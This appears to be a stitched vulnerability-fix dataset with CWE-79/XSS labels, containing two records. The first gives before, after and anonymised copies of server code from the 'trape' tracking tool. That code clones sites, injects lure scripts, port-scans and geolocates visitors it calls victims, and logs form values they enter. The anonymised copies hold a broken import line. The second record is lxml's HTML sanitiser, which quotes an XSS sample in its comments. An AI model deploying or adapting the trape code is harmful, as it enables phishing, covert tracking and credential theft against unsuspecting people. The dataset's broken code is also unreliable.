utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + vnetwork + utils.Color['white'] + " session detected from " + utils.Color['blue'] + vIp + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_victim_network', [vId, vnetwork], 3, 0))
if cant > 0:
db.sentences_victim('update_network', [vId, vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
db.sentences_victim('insert_networks', [vId, vIp, request.environ['REMOTE_ADDR'], vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/redv")
def redirectVictim():
url = request.args.get('url')
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(url).read(), 'vscript')
return html
@app.route("/regv", methods=["POST"])
def registerRequest():
vrequest = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
db.sentences_victim('insert_requests', [vrequest, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + vrequest.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + vrequest.site + utils.Color['white'] + '\t\n' + vrequest.fid + '\t' + vrequest.name + ':\t' + vrequest.value)
return json.dumps({'status' : 'OK', 'vId' : vrequest.id});
@app.route("/tping", methods=["POST"])
def receivePing():
vrequest = request.form['id']
db.sentences_victim('report_online', [vrequest])
return json.dumps({'status' : 'OK', 'vId' : vrequest});
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
#**
#
#########
# trape #
#########
#
# trape depends of this file
# For full copyright information this visit: https://github.com/boxug/trape
#
# Copyright 2017 by boxug / <hey@boxug.com>
#**
import time
import urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
# Main parts, to generate relationships among others
trape = core.stats.trape
app = core.stats.app
# call database
db = Database()
class victim_server(object):
@app.route("/" + trape.victim_path)
def homeVictim():
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(trape.url_to_clone).read(), 'lure')
return html
@app.route("/register", methods=["POST"])
def register():
vId = request.form['vId']
if vId == '':
vId = utils.generateToken(5)
victimConnect = victim(vId, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
victimGeo = victim_geo(vId, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + victimGeo.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_times', vId, 3, 0))
db.sentences_victim('insert_click', [vId, trape.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
db.sentences_victim('delete_networks', [vId], 2)
if cant > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(cant + 1) + " time")
db.sentences_victim('update_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('update_victim_geo', [victimGeo, vId], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
db.sentences_victim('insert_victim', [victimConnect, vId, time.time()], 2)
db.sentences_victim('insert_victim_geo', [victimGeo, vId], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/nr", methods=["POST"])
def networkRegister():
vId = request.form['vId']
vIp = request.form['ip']
vnetwork = request.form['red']
if vId == '':
vId = utils.generateToken(5)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + vnetwork + utils.Color['white'] + " session detected from " + utils.Color['blue'] + vIp + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + vId + utils.Color['white'])
cant = int(db.sentences_victim('count_victim_network', [vId, vnetwork], 3, 0))
if cant > 0:
db.sentences_victim('update_network', [vId, vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
db.sentences_victim('insert_networks', [vId, vIp, request.environ['REMOTE_ADDR'], vnetwork, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : vId});
@app.route("/redv")
def redirectVictim():
url = request.args.get('url')
opener = urllib2.build_opener()
headers = victim_headers()
opener.addheaders = headers
html = victim_inject_code(opener.open(url).read(), 'vscript')
return html
@app.route("/regv", methods=["POST"])
def registerRequest():
vrequest = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
db.sentences_victim('insert_requests', [vrequest, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + vrequest.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + vrequest.site + utils.Color['white'] + '\t\n' + vrequest.fid + '\t' + vrequest.name + ':\t' + vrequest.value)
return json.dumps({'status' : 'OK', 'vId' : vrequest.id});
@app.route("/tping", methods=["POST"])
def receivePing():
vrequest = request.form['id']
db.sentences_victim('report_online', [vrequest], 2)
return json.dumps({'status' : 'OK', 'vId' : vrequest});
| xss | {
"code": [
" db.sentences_victim('report_online', [vrequest])"
],
"line_no": [
100
]
} | {
"code": [
" db.sentences_victim('report_online', [vrequest], 2)"
],
"line_no": [
100
]
} |
import time
import .urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
VAR_0 = core.stats.trape
VAR_1 = core.stats.app
VAR_2 = Database()
class CLASS_0(object):
@VAR_1.route("/" + VAR_0.victim_path)
def FUNC_0():
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_0.url_to_clone).read(), 'lure')
return VAR_5
@VAR_1.route("/register", methods=["POST"])
def FUNC_1():
VAR_6 = request.form['vId']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
VAR_7 = victim(VAR_6, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
VAR_8 = victim_geo(VAR_6, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + VAR_8.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_times', VAR_6, 3, 0))
VAR_2.sentences_victim('insert_click', [VAR_6, VAR_0.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
VAR_2.sentences_victim('delete_networks', [VAR_6], 2)
if VAR_9 > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(VAR_9 + 1) + " time")
VAR_2.sentences_victim('update_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('update_victim_geo', [VAR_8, VAR_6], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
VAR_2.sentences_victim('insert_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('insert_victim_geo', [VAR_8, VAR_6], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/nr", methods=["POST"])
def FUNC_2():
VAR_6 = request.form['vId']
VAR_10 = request.form['ip']
VAR_11 = request.form['red']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + VAR_11 + utils.Color['white'] + " session detected from " + utils.Color['blue'] + VAR_10 + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_victim_network', [VAR_6, VAR_11], 3, 0))
if VAR_9 > 0:
VAR_2.sentences_victim('update_network', [VAR_6, VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
VAR_2.sentences_victim('insert_networks', [VAR_6, VAR_10, request.environ['REMOTE_ADDR'], VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/redv")
def FUNC_3():
VAR_12 = request.args.get('url')
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_12).read(), 'vscript')
return VAR_5
@VAR_1.route("/regv", methods=["POST"])
def FUNC_4():
VAR_13 = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
VAR_2.sentences_victim('insert_requests', [VAR_13, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + VAR_13.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + VAR_13.site + utils.Color['white'] + '\t\n' + VAR_13.fid + '\t' + VAR_13.name + ':\t' + VAR_13.value)
return json.dumps({'status' : 'OK', 'vId' : VAR_13.id});
@VAR_1.route("/tping", methods=["POST"])
def FUNC_5():
VAR_13 = request.form['id']
VAR_2.sentences_victim('report_online', [VAR_13])
return json.dumps({'status' : 'OK', 'vId' : VAR_13});
|
import time
import .urllib2
from flask import Flask, render_template, session, request, json
from core.victim_objects import *
import core.stats
from core.utils import utils
from core.db import Database
VAR_0 = core.stats.trape
VAR_1 = core.stats.app
VAR_2 = Database()
class CLASS_0(object):
@VAR_1.route("/" + VAR_0.victim_path)
def FUNC_0():
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_0.url_to_clone).read(), 'lure')
return VAR_5
@VAR_1.route("/register", methods=["POST"])
def FUNC_1():
VAR_6 = request.form['vId']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
VAR_7 = victim(VAR_6, request.environ['REMOTE_ADDR'], request.user_agent.platform, request.user_agent.browser, request.user_agent.version, utils.portScanner(request.environ['REMOTE_ADDR']), request.form['cpu'], time.strftime("%Y-%m-%d - %H:%M:%S"))
VAR_8 = victim_geo(VAR_6, 'city', request.form['countryCode'], request.form['country'], request.form['query'], request.form['lat'], request.form['lon'], request.form['org'], request.form['region'], request.form['regionName'], request.form['timezone'], request.form['zip'], request.form['isp'], str(request.user_agent))
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " A victim has been connected from " + utils.Color['blue'] + VAR_8.ip + utils.Color['white'] + ' with the following identifier: ' + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_times', VAR_6, 3, 0))
VAR_2.sentences_victim('insert_click', [VAR_6, VAR_0.url_to_clone, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
VAR_2.sentences_victim('delete_networks', [VAR_6], 2)
if VAR_9 > 0:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his " + str(VAR_9 + 1) + " time")
VAR_2.sentences_victim('update_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('update_victim_geo', [VAR_8, VAR_6], 2)
else:
utils.Go(utils.Color['white'] + "[" + utils.Color['blueBold'] + "*" + utils.Color['white'] + "]" + " " + "It\'s his first time")
VAR_2.sentences_victim('insert_victim', [VAR_7, VAR_6, time.time()], 2)
VAR_2.sentences_victim('insert_victim_geo', [VAR_8, VAR_6], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/nr", methods=["POST"])
def FUNC_2():
VAR_6 = request.form['vId']
VAR_10 = request.form['ip']
VAR_11 = request.form['red']
if VAR_6 == '':
VAR_6 = utils.generateToken(5)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + VAR_11 + utils.Color['white'] + " session detected from " + utils.Color['blue'] + VAR_10 + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_victim_network', [VAR_6, VAR_11], 3, 0))
if VAR_9 > 0:
VAR_2.sentences_victim('update_network', [VAR_6, VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
VAR_2.sentences_victim('insert_networks', [VAR_6, VAR_10, request.environ['REMOTE_ADDR'], VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/redv")
def FUNC_3():
VAR_12 = request.args.get('url')
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_12).read(), 'vscript')
return VAR_5
@VAR_1.route("/regv", methods=["POST"])
def FUNC_4():
VAR_13 = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
VAR_2.sentences_victim('insert_requests', [VAR_13, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + VAR_13.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + VAR_13.site + utils.Color['white'] + '\t\n' + VAR_13.fid + '\t' + VAR_13.name + ':\t' + VAR_13.value)
return json.dumps({'status' : 'OK', 'vId' : VAR_13.id});
@VAR_1.route("/tping", methods=["POST"])
def FUNC_5():
VAR_13 = request.form['id']
VAR_2.sentences_victim('report_online', [VAR_13], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_13});
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
21,
22,
23,
26,
27,
29,
38,
44,
47,
50,
53,
63,
72,
74,
80,
89,
96,
102
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
21,
22,
23,
26,
27,
29,
38,
44,
47,
50,
53,
63,
72,
74,
80,
89,
96,
102
] |
1CWE-79
| """A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
import re
import copy
try:
from urlparse import urlsplit
except ImportError:
# Python 3
from urllib.parse import urlsplit
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
bytes
except NameError:
# Python < 2.6
bytes = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_css_javascript_re = re.compile(
r'expression\s*\(.*?\)', re.S|re.I)
# Do I have to worry about @\nimport?
_css_import_re = re.compile(
r'@\s*import', re.I)
# All kinds of schemes besides just javascript: that can cause
# execution:
_is_image_dataurl = re.compile(
r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def _is_javascript_scheme(s):
if _is_image_dataurl(s):
return None
return _is_possibly_malicious_scheme(s)
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: should data: be blocked?
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
    """
    Instances cleans the document of each of the possible offending
    elements.  The cleaning is controlled by attributes; you can
    override attributes in a subclass, or set them in the constructor.

    ``scripts``:
        Removes any ``<script>`` tags.

    ``javascript``:
        Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
        as they could contain Javascript.

    ``comments``:
        Removes any comments.

    ``style``:
        Removes any style tags.

    ``inline_style``
        Removes any style attributes.  Defaults to the value of the ``style`` option.

    ``links``:
        Removes any ``<link>`` tags

    ``meta``:
        Removes any ``<meta>`` tags

    ``page_structure``:
        Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.

    ``processing_instructions``:
        Removes any processing instructions.

    ``embedded``:
        Removes any embedded objects (flash, iframes)

    ``frames``:
        Removes any frame-related tags

    ``forms``:
        Removes any form tags

    ``annoying_tags``:
        Tags that aren't *wrong*, but are annoying.  ``<blink>`` and ``<marquee>``

    ``remove_tags``:
        A list of tags to remove.  Only the tags will be removed,
        their content will get pulled up into the parent tag.

    ``kill_tags``:
        A list of tags to kill.  Killing also removes the tag's content,
        i.e. the whole subtree, not just the tag itself.

    ``allow_tags``:
        A list of tags to include (default include all).

    ``remove_unknown_tags``:
        Remove any tags that aren't standard parts of HTML.

    ``safe_attrs_only``:
        If true, only include 'safe' attributes (specifically the list
        from the feedparser HTML sanitisation web site).

    ``safe_attrs``:
        A set of attribute names to override the default list of attributes
        considered 'safe' (when safe_attrs_only=True).

    ``add_nofollow``:
        If true, then any <a> tags will have ``rel="nofollow"`` added to them.

    ``host_whitelist``:
        A list or set of hosts that you can use for embedded content
        (for content like ``<object>``, ``<link rel="stylesheet">``, etc).

        You can also implement/override the method
        ``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
        implement more complex rules for what can be embedded.
        Anything that passes this test will be shown, regardless of
        the value of (for instance) ``embedded``.

        Note that this parameter might not work as intended if you do not
        make the links absolute before doing the cleaning.

        Note that you may also need to set ``whitelist_tags``.

    ``whitelist_tags``:
        A set of tags that can be included with ``host_whitelist``.
        The default is ``iframe`` and ``embed``; you may wish to
        include other tags like ``script``, or you may want to
        implement ``allow_embedded_url`` for more control.  Set to None to
        include all tags.

    This modifies the document *in place*.
    """

    # Option defaults; see the class docstring for their meanings.
    scripts = True
    javascript = True
    comments = True
    style = False
    inline_style = None
    links = True
    meta = True
    page_structure = True
    processing_instructions = True
    embedded = True
    frames = True
    forms = True
    annoying_tags = True
    remove_tags = None
    allow_tags = None
    kill_tags = None
    remove_unknown_tags = True
    safe_attrs_only = True
    safe_attrs = defs.safe_attrs
    add_nofollow = False
    host_whitelist = ()
    whitelist_tags = set(['iframe', 'embed'])

    def __init__(self, **kw):
        # Reject typos in option names instead of silently ignoring them.
        for name, value in kw.items():
            if not hasattr(self, name):
                raise TypeError(
                    "Unknown parameter: %s=%r" % (name, value))
            setattr(self, name, value)
        if self.inline_style is None and 'inline_style' not in kw:
            # inline_style follows `style` unless set explicitly.
            self.inline_style = self.style

    # Used to lookup the primary URL for a given tag that is up for
    # removal:
    _tag_link_attrs = dict(
        script='src',
        link='href',
        # From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
        # From what I can tell, both attributes can contain a link:
        applet=['code', 'object'],
        iframe='src',
        embed='src',
        layer='src',
        # FIXME: there doesn't really seem like a general way to figure out what
        # links an <object> tag uses; links often go in <param> tags with values
        # that we don't really know.  You'd have to have knowledge about specific
        # kinds of plugins (probably keyed off classid), and match against those.
        ##object=?,
        # FIXME: not looking at the action currently, because it is more complex
        # than than -- if you keep the form, you should keep the form controls.
        ##form='action',
        a='href',
        )

    def __call__(self, doc):
        """
        Cleans the document.
        """
        if hasattr(doc, 'getroot'):
            # ElementTree instance, instead of an element
            doc = doc.getroot()
        # convert XHTML to HTML
        xhtml_to_html(doc)
        # Normalize a case that IE treats <image> like <img>, and that
        # can confuse either this step or later steps.
        for el in doc.iter('image'):
            el.tag = 'img'
        if not self.comments:
            # Of course, if we were going to kill comments anyway, we don't
            # need to worry about this
            self.kill_conditional_comments(doc)

        kill_tags = set(self.kill_tags or ())
        remove_tags = set(self.remove_tags or ())
        allow_tags = set(self.allow_tags or ())

        if self.scripts:
            kill_tags.add('script')
        if self.safe_attrs_only:
            safe_attrs = set(self.safe_attrs)
            for el in doc.iter(etree.Element):
                attrib = el.attrib
                for aname in attrib.keys():
                    if aname not in safe_attrs:
                        del attrib[aname]
        if self.javascript:
            if not (self.safe_attrs_only and
                    self.safe_attrs == defs.safe_attrs):
                # safe_attrs handles events attributes itself
                for el in doc.iter(etree.Element):
                    attrib = el.attrib
                    for aname in attrib.keys():
                        if aname.startswith('on'):
                            del attrib[aname]
            doc.rewrite_links(self._remove_javascript_link,
                              resolve_base_href=False)
            # If we're deleting style then we don't have to remove JS links
            # from styles, otherwise...
            if not self.inline_style:
                for el in _find_styled_elements(doc):
                    old = el.get('style')
                    new = _css_javascript_re.sub('', old)
                    new = _css_import_re.sub('', new)
                    if self._has_sneaky_javascript(new):
                        # Something tricky is going on...
                        del el.attrib['style']
                    elif new != old:
                        el.set('style', new)
            if not self.style:
                for el in list(doc.iter('style')):
                    if el.get('type', '').lower().strip() == 'text/javascript':
                        el.drop_tree()
                        continue
                    old = el.text or ''
                    new = _css_javascript_re.sub('', old)
                    # The imported CSS can do anything; we just can't allow:
                    # (note: 'old' is passed here, so the expression-stripping
                    # above is discarded; _has_sneaky_javascript() below still
                    # rejects any remaining 'expression(' content)
                    new = _css_import_re.sub('', old)
                    if self._has_sneaky_javascript(new):
                        # Something tricky is going on...
                        el.text = '/* deleted */'
                    elif new != old:
                        el.text = new
        if self.comments or self.processing_instructions:
            # FIXME: why either?  I feel like there's some obscure reason
            # because you can put PIs in comments...?  But I've already
            # forgotten it
            kill_tags.add(etree.Comment)
        if self.processing_instructions:
            kill_tags.add(etree.ProcessingInstruction)
        if self.style:
            kill_tags.add('style')
        if self.inline_style:
            etree.strip_attributes(doc, 'style')
        if self.links:
            kill_tags.add('link')
        elif self.style or self.javascript:
            # We must get rid of included stylesheets if Javascript is not
            # allowed, as you can put Javascript in them
            for el in list(doc.iter('link')):
                if 'stylesheet' in el.get('rel', '').lower():
                    # Note this kills alternate stylesheets as well
                    if not self.allow_element(el):
                        el.drop_tree()
        if self.meta:
            kill_tags.add('meta')
        if self.page_structure:
            remove_tags.update(('head', 'html', 'title'))
        if self.embedded:
            # FIXME: is <layer> really embedded?
            # We should get rid of any <param> tags not inside <applet>;
            # These are not really valid anyway.
            for el in list(doc.iter('param')):
                parent = el.getparent()
                while parent is not None and parent.tag not in ('applet', 'object'):
                    parent = parent.getparent()
                if parent is None:
                    el.drop_tree()
            kill_tags.update(('applet',))
            # The alternate contents that are in an iframe are a good fallback:
            remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
        if self.frames:
            # FIXME: ideally we should look at the frame links, but
            # generally frames don't mix properly with an HTML
            # fragment anyway.
            kill_tags.update(defs.frame_tags)
        if self.forms:
            remove_tags.add('form')
            kill_tags.update(('button', 'input', 'select', 'textarea'))
        if self.annoying_tags:
            remove_tags.update(('blink', 'marquee'))

        # Collect first, then mutate, so we never modify the tree while
        # iterating over it.
        _remove = []
        _kill = []
        for el in doc.iter():
            if el.tag in kill_tags:
                if self.allow_element(el):
                    continue
                _kill.append(el)
            elif el.tag in remove_tags:
                if self.allow_element(el):
                    continue
                _remove.append(el)

        if _remove and _remove[0] == doc:
            # We have to drop the parent-most tag, which we can't
            # do.  Instead we'll rewrite it:
            el = _remove.pop(0)
            el.tag = 'div'
            el.attrib.clear()
        elif _kill and _kill[0] == doc:
            # We have to drop the parent-most element, which we can't
            # do.  Instead we'll clear it:
            el = _kill.pop(0)
            if el.tag != 'html':
                el.tag = 'div'
            el.clear()
        _kill.reverse() # start with innermost tags
        for el in _kill:
            el.drop_tree()
        for el in _remove:
            el.drop_tag()

        if self.remove_unknown_tags:
            if allow_tags:
                raise ValueError(
                    "It does not make sense to pass in both allow_tags and remove_unknown_tags")
            allow_tags = set(defs.tags)
        if allow_tags:
            bad = []
            for el in doc.iter():
                if el.tag not in allow_tags:
                    bad.append(el)
            if bad:
                if bad[0] is doc:
                    el = bad.pop(0)
                    el.tag = 'div'
                    el.attrib.clear()
                for el in bad:
                    el.drop_tag()
        if self.add_nofollow:
            for el in _find_external_links(doc):
                if not self.allow_follow(el):
                    rel = el.get('rel')
                    if rel:
                        if ('nofollow' in rel
                                and ' nofollow ' in (' %s ' % rel)):
                            continue
                        rel = '%s nofollow' % rel
                    else:
                        rel = 'nofollow'
                    el.set('rel', rel)

    def allow_follow(self, anchor):
        """
        Override to suppress rel="nofollow" on some anchors.
        """
        return False

    def allow_element(self, el):
        """
        Decide whether an element slated for removal may be kept.

        Only tags listed in ``_tag_link_attrs`` are candidates; the
        decision on each link attribute is delegated to
        ``allow_embedded_url()``.
        """
        if el.tag not in self._tag_link_attrs:
            return False
        attr = self._tag_link_attrs[el.tag]
        if isinstance(attr, (list, tuple)):
            # Every one of the attributes must be present and allowed.
            for one_attr in attr:
                url = el.get(one_attr)
                if not url:
                    return False
                if not self.allow_embedded_url(el, url):
                    return False
            return True
        else:
            url = el.get(attr)
            if not url:
                return False
            return self.allow_embedded_url(el, url)

    def allow_embedded_url(self, el, url):
        """
        Decide whether embedded content at *url* may be kept: only
        http(s) URLs on a whitelisted host, in a whitelisted tag.
        """
        if (self.whitelist_tags is not None
                and el.tag not in self.whitelist_tags):
            return False
        scheme, netloc, path, query, fragment = urlsplit(url)
        netloc = netloc.lower().split(':', 1)[0]
        if scheme not in ('http', 'https'):
            return False
        if netloc in self.host_whitelist:
            return True
        return False

    def kill_conditional_comments(self, doc):
        """
        IE conditional comments basically embed HTML that the parser
        doesn't normally see.  We can't allow anything like that, so
        we'll kill any comments that could be conditional.
        """
        self._kill_elements(
            doc, lambda el: _conditional_comment_re.search(el.text),
            etree.Comment)

    def _kill_elements(self, doc, condition, iterate=None):
        # Collect matching elements first, then drop them, so the tree is
        # never mutated while being iterated.
        bad = []
        for el in doc.iter(iterate):
            if condition(el):
                bad.append(el)
        for el in bad:
            el.drop_tree()

    def _remove_javascript_link(self, link):
        # links like "j a v a s c r i p t:" might be interpreted in IE
        # Percent-decode before checking the scheme; otherwise an encoded
        # link like "java%73cript:..." slips past _is_javascript_scheme.
        try:
            from urllib import unquote_plus   # Python 2
        except ImportError:
            from urllib.parse import unquote_plus   # Python 3
        new = _substitute_whitespace('', unquote_plus(link))
        if _is_javascript_scheme(new):
            # FIXME: should this be None to delete?
            return ''
        return link

    _substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub

    def _has_sneaky_javascript(self, style):
        """
        Depending on the browser, stuff like ``e x p r e s s i o n(...)``
        can get interpreted, or ``expre/* stuff */ssion(...)``.  This
        checks for attempt to do stuff like this.

        Typically the response will be to kill the entire style; if you
        have just a bit of Javascript in the style another rule will catch
        that and remove only the Javascript from the style; this catches
        more sneaky attempts.
        """
        style = self._substitute_comments('', style)
        style = style.replace('\\', '')
        style = _substitute_whitespace('', style)
        style = style.lower()
        if 'javascript:' in style:
            return True
        if 'expression(' in style:
            return True
        return False

    def clean_html(self, html):
        """
        Clean an HTML string or parsed document, returning the cleaned
        markup in the same type as the input.
        """
        result_type = type(html)
        if isinstance(html, basestring):
            doc = fromstring(html)
        else:
            doc = copy.deepcopy(html)
        self(doc)
        return _transform_result(result_type, doc)
# A ready-made Cleaner with the default options, plus a module-level
# convenience alias for its clean_html() method.
clean = Cleaner()
clean_html = clean.clean_html


############################################################
## Autolinking
############################################################

